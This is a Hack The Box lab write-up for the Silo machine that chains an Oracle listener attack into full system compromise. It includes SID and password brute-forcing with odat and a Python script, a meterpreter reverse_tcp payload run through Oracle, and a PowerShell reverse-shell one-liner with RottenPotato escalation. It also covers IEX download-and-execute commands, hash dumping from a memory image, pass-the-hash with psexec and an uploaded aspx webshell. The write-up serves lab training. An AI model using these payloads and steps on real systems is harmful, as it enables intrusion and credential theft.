This machine involves oracle database and has never been involved before. I also take this opportunity to get familiar with the operation method of this database; As well as the knowledge about memory forensics, I just learned the forensics master in the Meiya Cup last time, so I also took this opportunity to learn the relevant knowledge of forensics
prospecting
nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0.073s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-09T05:17:36 |_ start_date: 2021-02-09T03:07:49 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
It can be seen that port 80 is open iis8 5. Search for no exploitable loopholes. It should be a rabbit hole
135, and five digits are rpc, and there are no exploitable vulnerabilities
rpcclient -U '' 10.10.10.82 Enter WORKGROUP\'s password: Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139 and 445 can see each other's system, and there is nothing in the shared folder
$smbclient -L //$ip/ Enter WORKGROUP\chris's password: session setup failed: NT_STATUS_ACCESS_DENIED ┌─[root@kali]─[~] └──╼ $smbmap -H $ip [!] 445 not open on 10.10.10.82....
1521 is Oracle TNS Oracle TNS listener, which is a listening port of Oracle database. There is a exploitable vulnerability
Get system permission
Method 1
This method does not require access to www
First install odat, directly type odat in kali, and then the installation will start automatically
Then start using
~ odat sidguesser -s 10.10.10.82 [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... ########## | ETA: 00:00:01 [+] 'XEXDB' is a valid SID. Continue... 100% |#######################################################| Time: 00:02:22 [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |#######################################################| Time: 00:00:05 [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... #### | ETA: 00:00:15 100% |#######################################################| Time: 00:02:22 [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
Two available SIDS are found, and XE is available after test
Similarly, msf can be used to guess sid in this step
use scanner/oracle/sid_enum, remember to change a bigger dictionary
"/usr/share/metasploit-framework/data/wordlists/sid.txt"
User password explosion
Then the user name and password:
➜ ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt [+] Valid credentials found: scott/tiger. Continue...
Then I saw another use of odat
Later, I will study and explain in detail in the article on odat
odat all -s 10.10.10.82 -p 1521 -d XE --snipped-- +] Valid credentials found: scott/tiger. Continue... --snipped--
There is also a script written by 0xdf boss himself to blow up the password HTB: Silo | 0xdf hacks stuff
#!/usr/bin/env python
import cx_Oracle
import sys
from multiprocessing import Pool
MAX_PROC = 50
host = "10.10.10.82"
sid = "XE"
def usage():
print("{} [ip] [wordlist]".format(sys.argv[0]))
print(" wordlist should be of the format [username]:[password]")
sys.exit(1)
def scan(userpass):
u, p = userpass.split(':')[:2]
try:
conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid))
return u, p, True
except cx_Oracle.DatabaseError:
return u, p, False
def main(host, userpassfile, nprocs=MAX_PROC):
with open(userpassfile, 'r') as f:
userpass = f.read().rstrip().replace('\r','').split('\n')
pool = Pool(processes=nprocs)
for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]):
if status:
print("Found {} / {}\n\n".format(username, pass_))
else:
sys.stdout.write("\r {}/{} ".format(username, pass_))
if __name__ == '__main__':
if len(sys.argv) != 3:
usage()
main(sys.argv[1], sys.argv[2])There is nothing in the database. Here, we upload malicious files to execute:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe
Remember to use msf to turn on listening before executing the script
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.16.7 lhost => 10.10.16.7 msf6 exploit(multi/handler) > set lport 4445 lport => 4445 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.16.7:4445 [*] Sending stage (200262 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800
Just do it
Method 2
Read files directly with odat
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt [1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server [+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'): 82FDAB14799E467FCE23979F9C1BF92C
Method 3
Thanks 0xdf for your ideas
When we find SeImpersonatePrivilege through whoami /priv under a common permission, it proves that we can use RottenPotato to raise the right
PS C:\windows\system32\inetsrv>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Let's download msfrottenpotato exe GitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITYSYSTEM.
Then compile a bat file
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"Then download
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat')
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')Then run the script
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat connect sock CreateIlok: 0 0 start RPC connection CreateDoc: 0 0 COM -> bytes received: 116 RPC -> bytes Sent: 116 RPC -> bytes received: 84 COM -> bytes sent: 84 COM -> bytes received: 24 RPC -> bytes Sent: 24 RPC -> bytes received: 132 COM -> bytes sent: 132 COM -> bytes received: 127 RPC -> bytes Sent: 127 RPC -> bytes received: 196 COM -> bytes sent: 196 COM -> bytes received: 243 RPC -> bytes Sent: 243 RPC -> bytes received: 192 COM -> bytes sent: 192 COM -> bytes received: 72 RPC -> bytes Sent: 72 RPC -> bytes received: 60 COM -> bytes sent: 60 COM -> bytes received: 42 RPC -> bytes Sent: 42 RPC -> bytes received: 56 COM -> bytes sent: 56 CoGet: -2147022986 0 [+] authresult != -1 [+] Elevated Token tye:2 [+] DuplicateTokenEx :1 0 [+] Duped Token type:1 [+] Running \temp\rev.bat sessionId 1 [+] CreateProcessWithTokenW OK Auth result: 0 Return code: 0 Last error: 0
Remember to turn on nc monitoring
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085 listening on [any] 8085 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181 PS C:\Windows\system32> whoami nt authority\system
Method 4
On the user's desktop, we will find not only a flag but also an issue Txt file
dir \users\Phineas\Desktop
Directory: C:\users\Phineas\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 1/5/2018 10:56 PM 300 Oracle issue.txt
-a--- 1/4/2018 9:41 PM 32 user.txt
After opening, I found that it was written in the file, the memory backup file was stored in the network disk, and the password was also found
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$
Then download it and try memory forensics with volatility
volatility kdbgscan -f SILO-20180105-221806.dmp ************************************************** Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit) Offset (V) : 0xf80078520a30 Offset (P) : 0x2320a30 KdCopyDataBlock (V) : 0xf8007845f9b0 Block encoded : Yes Wait never : 0xd08e8400bd4a143a Wait always : 0x17a949efd11db80 KDBG owner tag check : True Profile suggestion (KDBGHeader): Win2012R2x64_18340 Version64 : 0xf80078520d90 (Major: 15, Minor: 9600) Service Pack (CmNtCSDVersion) : 0 Build string (NtBuildLab) : 9600.16384.amd64fre.winblue_rtm. PsActiveProcessHead : 0xfffff80078537700 (51 processes) PsLoadedModuleList : 0xfffff800785519b0 (148 modules) KernelBase : 0xfffff8007828a000 (Matches MZ: True) Major (OptionalHeader) : 6 Minor (OptionalHeader) : 3 KPCR : 0xfffff8007857b000 (CPU 0) KPCR : 0xffffd000207e8000 (CPU 1) ************************************************** ...
Then try to get the hash of the account
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ------------------ ------------------ ---- 0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat 0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS 0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve 0xffffc0000001e000 0x0000000000b65000 [no name] 0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM 0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE 0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD 0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE 0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT 0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY 0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM 0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT 0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI 0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT 0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000 Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
Finally, try to log in with psexec and hash
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82 Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies [*] Requesting shares on 10.10.10.82..... [*] Found writable share ADMIN$ [*] Uploading file XryxqKFr.exe [*] Opening SVCManager on 10.10.10.82..... [*] Creating service PAYb on 10.10.10.82..... [*] Starting service PAYb..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
Post infiltration
Because I directly used the odat script, I didn't even get the account and password of the database in the process of penetration. I looked at other people's ideas when sorting out my notes, and sorted out a copy of the steps to log in to the database (I didn't even install oracle on my machine, which was really painful when installing the database later)
Database exploration
stay HTB: Silo - PurpleRabbit This article explains the method that you can log in without installing oracle database and only use sqlplus. I'll write its method here first
sqlplus scott/tiger@$10.10.10.84:1521/XE SQL> select table_name from user_tables; TABLE_NAME ------------------------------ DEPT EMP BONUS SALGRADE SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT RESOURCE NO YES NO
Found nothing in his database
Access to www
The idea comes from 0xdf
adopt
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx [1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server [+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)
Upload a web command to execute the script, and then pass the previous iis8 5 to execute
Then we use this command line to remotely download our shell forwarding script
Open locally web service
python -m SimpleHTTPServer 80
Then on the command line
powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')Get a forwarding shell